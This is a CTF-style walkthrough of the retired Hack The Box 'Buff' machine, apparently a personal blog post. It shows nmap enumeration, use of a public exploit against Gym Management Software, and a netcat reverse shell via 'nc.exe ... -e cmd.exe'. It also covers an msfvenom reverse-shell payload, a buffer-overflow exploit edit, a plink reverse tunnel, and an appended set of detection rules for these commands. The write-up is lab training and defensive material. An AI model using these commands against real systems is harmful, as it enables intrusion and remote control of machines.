Redhalo

Hack the Box Walkthrough – BUFF machine

Hi, you guys!

Welcome to my very first walkthrough of a Hack The Box retired machine. This write-up is about the easy Buff machine, which was created by egotisticalSW.

Let’s jump in!

Enumeration

Basic enumeration starts with an nmap scan. I usually use the following command:

$ nmap -sC -sV -oA nmap 10.129.50.243 -p-

But here the result was not what I expected:

$ nmap -sC -sV -oA nmap 10.129.50.243 -p-
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-22 10:00 EST
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.46 seconds

As suggested in the output, the -Pn parameter (skip host discovery and treat the host as up) may help here.

$ nmap -sC -sV -oA nmap 10.129.50.243 -p- -Pn
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-22 10:03 EST
Stats: 0:07:08 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 62.43% done; ETC: 10:14 (0:04:18 remaining)
Nmap scan report for 10.129.50.243
Host is up (0.063s latency).
Not shown: 65532 filtered ports
PORT     STATE SERVICE    VERSION
5040/tcp open  unknown
7680/tcp open  pando-pub?
8080/tcp open  http       Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-title: mrb3n's Bro Hut

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 761.09 seconds

Much better indeed.

We can see that Apache httpd is running on port 8080, so let’s have a look.

It looks like a site for a fitness gym or something like that.

After a quick review of the available pages, I found the CMS used by the site on the contact.php page: Gym Management Software 1.0.

Foothold

A look at searchsploit gives us an interesting exploit:

If, like me, you use a fresh Kali install, you may get error messages about missing modules when you execute the exploit:

$ python 48506.py http://10.129.29.204:8080/
Traceback (most recent call last):
  File "48506.py", line 37, in <module>
    import requests, sys, urllib, re
ImportError: No module named requests

and

$ python 48506.py http://10.129.50.243:8080
Traceback (most recent call last):
  File "48506.py", line 38, in <module>
    from colorama import Fore, Back, Style
ImportError: No module named colorama

You can install them with the following commands:

$ curl -0 https://bootstrap.pypa.io/get-pip.py -o get-pip.py
$ python get-pip.py
$ python -m pip install requests
$ python -m pip install colorama

Then we can run the Python exploit:

Very nice: we have a basic shell.

Let’s upgrade it by using the Windows version of Netcat.

Start a web server on your Kali box and, from the Buff machine, download the netcat binary that can be found in /usr/share/windows-binaries.

I start a netcat listener with the following command:

nc -lvnp 4242

Then run the following on the Buff machine to get a reverse shell:

nc.exe 10.10.14.51 4242 -e cmd.exe

Lateral Movement

Navigating through the folders I have access to, I found an executable in the Downloads folder of the user shaun.

It is not there for nothing.

Again, a searchsploit command gives nice results:

Privilege Escalation

I used the following exploit: https://www.exploit-db.com/raw/48389

I edited the exploit with a payload generated by the following msfvenom command:

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.51 LPORT=1337 EXITFUNC=thread -b "\x00\x0d\x0a" -f python

I changed the following part:

payload    = b"..."  # msfvenom-generated shellcode bytes omitted here
overrun    = b"C" * (1500 - len(padding1 + NOPS + EIP + payload))
buf = padding1 + EIP + NOPS + payload + overrun
try:
        s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((target,8888))

to this:

buf  = b""
buf += b"..."  # msfvenom-generated shellcode bytes omitted here
overrun    = b"C" * (1500 - len(padding1 + NOPS + EIP + buf))

buf = padding1 + EIP + NOPS + buf + overrun

try:
        s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # 4242 is the local end of the plink reverse tunnel, which lands on 127.0.0.1:8888 on Buff
        s.connect((target,4242))

The next point is that our exploit is a Python script which needs to be executed locally on the victim machine, and Python is not installed there. Here comes the pivoting.

I will use the Windows binary plink for that.

First, it needs to be downloaded onto the victim machine.

Be aware that I had to download the latest version from the official website https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html to fix the following error message, which I got with the binary available on Kali:

FATAL ERROR: Couldn't agree a key exchange algorithm (available: curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256)

For the pivoting I had to change the SSH configuration of my Kali machine: I changed the SSH port to 4141 instead of 22.

I can’t explain why it does not work otherwise, but I read somewhere that with the HTB VPN it is better to change this port.

Then, to start the SSH daemon, run the following command:

sudo systemctl start ssh

Then I can run the following command on the victim machine:

plink.exe -P 4141 -l kali -pw "kali" 10.10.14.51 -R 4242:127.0.0.1:8888

I started a new netcat listener on port 1337:

nc -lvnp 1337

Then, finally, I ran the Python exploit.

Our listener got a connection and voilà, we are administrator.
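From a defender's point of view, the tools used above (nc.exe with -e cmd.exe spawned by the web server, plink.exe with -R and a password on the command line) leave distinctive process command lines. The following is an added example, not part of the original walkthrough, that runs simple detection rules over constructed process-creation records; the file paths, parent processes and the Sysmon-like record format are assumptions.

```python
import re
from dataclasses import dataclass

# Constructed process-creation events ("image|command line|parent image", a simplified
# Sysmon EventID 1 layout). Paths are made up; the command lines mirror the walkthrough.
SAMPLE_EVENTS = [
    r"C:\xampp\htdocs\gym\upload\nc.exe|nc.exe 10.10.14.51 4242 -e cmd.exe|C:\xampp\apache\bin\httpd.exe",
    r"C:\Users\shaun\Downloads\plink.exe|plink.exe -P 4141 -l kali -pw kali 10.10.14.51 -R 4242:127.0.0.1:8888|C:\Windows\System32\cmd.exe",
    r"C:\Windows\System32\cmd.exe|cmd.exe /c whoami|C:\Windows\System32\conhost.exe",
    r"C:\Program Files\PuTTY\plink.exe|plink.exe -batch admin@jumphost uptime|C:\Windows\explorer.exe",
]

@dataclass
class Finding:
    rule: str
    image: str
    cmdline: str

# Each rule: name, regex on the command line, optional regex on the parent image.
RULES = [
    # nc.exe <ip> <port> -e cmd.exe: the reverse shell used to upgrade the web shell
    ("netcat_reverse_shell", re.compile(r"\bnc(64)?\.exe\b.*\s-e\s+(cmd|powershell)", re.I), None),
    # plink.exe ... -R <port>:<host>:<port>: a reverse SSH tunnel used for pivoting
    ("plink_remote_forward", re.compile(r"\bplink\.exe\b.*\s-R\s+\d+:", re.I), None),
    # a clear-text password passed on the command line
    ("plink_password_on_cmdline", re.compile(r"\bplink\.exe\b.*\s-pw\s+\S+", re.I), None),
    # any process whose parent is the web server: a PHP web shell spawning commands
    ("webserver_spawned_process", re.compile(r".*"), re.compile(r"\\httpd\.exe$|\\php(-cgi)?\.exe$", re.I)),
]

def parse_event(line):
    # Split one "image|cmdline|parent" record into its three fields.
    image, cmdline, parent = line.split("|", 2)
    return image, cmdline, parent

def scan(events):
    # Return one Finding per (event, rule) pair that matches.
    findings = []
    for line in events:
        image, cmdline, parent = parse_event(line)
        for name, cmd_re, parent_re in RULES:
            if not cmd_re.search(cmdline):
                continue
            if parent_re is not None and not parent_re.search(parent):
                continue
            findings.append(Finding(name, image, cmdline))
    return findings

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.rule}] {f.image}: {f.cmdline}")
```

Running it flags the first two records (four findings in total) and leaves the plain cmd.exe and the ordinary plink session alone.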